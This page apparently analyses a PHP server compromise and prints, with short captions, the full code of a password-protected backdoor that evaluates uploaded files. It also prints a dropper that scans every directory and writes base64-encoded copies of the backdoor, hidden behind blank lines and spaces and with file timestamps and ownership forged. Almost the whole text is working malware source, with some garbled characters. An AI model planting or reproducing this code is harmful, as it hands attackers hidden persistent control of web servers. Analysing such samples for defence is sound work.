| |
This is the Malcode, a Backdoor to your Server: | |
--------------------------------- BASE64CODE ------------------------ <?php error_reporting(1); global $HTTP_SERVER_VARS; function say($t) { echo "$t\n"; }; function testdata($t) { say(md5("testdata_$t")); }; echo "<pre>"; testdata('start'); if (md5($_POST["p"])=="aace99428c50dbe965acc93f3f275cd3") { if ($code = @fread(@fopen( $HTTP_POST_FILES["f"]["tmp_name"],"rb"), $HTTP_POST_FILES["f"]["size"])) { eval($code); } else { testdata('f'); }; } else { testdata('pass'); }; testdata('end'); echo "</pre>"; ?> --------------------------------- END ------------------------ | |
This is the Just_a_test PHP-code sent once to your Server: | |
<?php error_reporting(1); global $HTTP_SERVER_VARS; $START = time(); $WD_TIMEOUT = array(8,7,6,6,5,5,5,5,0); function my_fwrite($f,$data) { global $CURFILE; $file_mtime = @filemtime($f); $file_atime = @fileatime($f); $dir_mtime = @filemtime(@dirname($f)); $dir_atime = @fileatime(@dirname($f)); if ($file_h = @fopen($f,"wb")) { @fwrite($file_h,$data); @fclose($file_h); if ($file_mtime) { @touch($f,$file_mtime,$file_atime); } elseif(@filemtime($CURFILE)) { @chmod($f,@fileperms($CURFILE)); @touch($f,@filemtime($CURFILE),@fileatime($CURFILE)); @chgrp($f,@filegroup($CURFILE)); @chown($f,@fileowner($CURFILE)); }; if ($dir_mtime) @touch(@dirname($f),$dir_mtime,$dir_atime); return $f; } else { return ''; }; }; function ext($f) { return substr($f, strrpos($f, ".") + 1); }; | |
... scan all your server directories: | |
function walkdir($p,$func='_walkdir',$l=0) { global $START; global $WD_TIMEOUT; global $FL; $func_f = "{$func}_f"; $func_d = "{$func}_d"; $func_s = "{$func}_s"; $func_e = "{$func}_e"; if ($dh = @opendir("$p")) { if (function_exists($func_s)) { if ($func_s($p,$l)) return 1; }; while ($f = @readdir($dh)) { if (time() - $START )= $WD_TIMEOUT[$l] ) break; if ($f == '.' || $f == '..' ) continue; if (@is_dir ("$p$f/") ) walkdir("$p$f/",$func,$l+1); if (@is_dir ("$p$f/") && function_exists($func_d)) $func_d("$p$f/",$l); if (@is_file("$p$f" ) && function_exists($func_f)) $func_f("$p$f" ,$l); }; closedir($dh); if (function_exists($func_e)) $func_e($p,$l); }; }; function r_cut($p) { global $R; return substr($p,strlen($R)); }; function say($t) { echo "$t\n"; }; function testdata($t) { say(md5("testdata_$t")); }; $R = $HTTP_SERVER_VARS['DOCUMENT_ROOT']; $CURFILE = $HTTP_SERVER_VARS['DOCUMENT_ROOT'].$HTTP_SERVER_VARS['SCRIPT_NAME']; echo "<pre>"; testdata('start'); $fe = ext($CURFILE); if (!$fe) $fe = 'php'; $FN = "namogofer.$fe"; function _walkdir_s($d,$l) { global $FCNT; $FCNT = array('fn' =) '','dir' =) 0,'file' =) 0,'simtype' =) 0); }; function _walkdir_d($d,$l) { global $FCNT; $FCNT['dir' ]++; }; function _walkdir_f($f,$l) { global $FCNT; $FCNT['file']++; if (ext($f) == ext($CURFILE)) $FCNT['simtype']++; }; |
|
At this point, Just_a_test Zombie-code is written all over your Server: |
function _walkdir_e($d,$l) { global $C,$FCNT,$FN; if ($C[$l](7) { if (my_fwrite("$d$FN", str_repeat("\n",100) // Hide Code with 100 empty lines .str_repeat(' ',150) // Hide Code with 150 spaces //----------- Malcode is Here: ------------------------------ .base64_decode('PD9waHAgZXJyb3JfcmVwb3J0aW5nKDEpO2dsb2JhbCAkSFRUUF9TRVJWRVJfVkFSUzsgZnVuY3Rpb24gc2F5KCR0KSB7IGVjaG8gIiR0XG4iOyB9OyBmdW5jdGlvbiB0ZXN0ZGF0YSgkdCkgeyBzYXkobWQ1KCJ0ZXN0ZGF0YV8kdCIpKTsgfTsgZWNobyAiPHByZT4iOyB0ZXN0ZGF0YSgnc3RhcnQnKTsgaWYgKG1kNSgkX1BPU1RbInAiXSk9PSJhYWNlOTk0MjhjNTBkYmU5NjVhY2M5M2YzZjI3NWNkMyIpeyBpZiAoJGNvZGUgPSBAZnJlYWQoQGZvcGVuKCRIVFRQX1BPU1RfRklMRVNbImYiXVsidG1wX25hbWUiXSwicmIiKSwkSFRUUF9QT1NUX0ZJTEVTWyJmIl1bInNpemUiXSkpeyBldmFsKCRjb2RlKTsgfWVsc2V7IHRlc3RkYXRhKCdmJyk7IH07IH1lbHNleyB0ZXN0ZGF0YSgncGFzcycpOyB9OyB0ZXN0ZGF0YSgnZW5kJyk7IGVjaG8gIjwvcHJlPiI7ID8+') .str_repeat(' ',150) // Hide Code with 150 spaces ."\n".str_repeat("\n",100))) // Hide Code with 100 empty lines { $C[$l]++; $FCNT['fn'] = r_cut("$d$FN"); say(implode("\t",$FCNT)); }; }; }; walkdir("$R/"); testdata('end'); echo "(/pre)"; ?>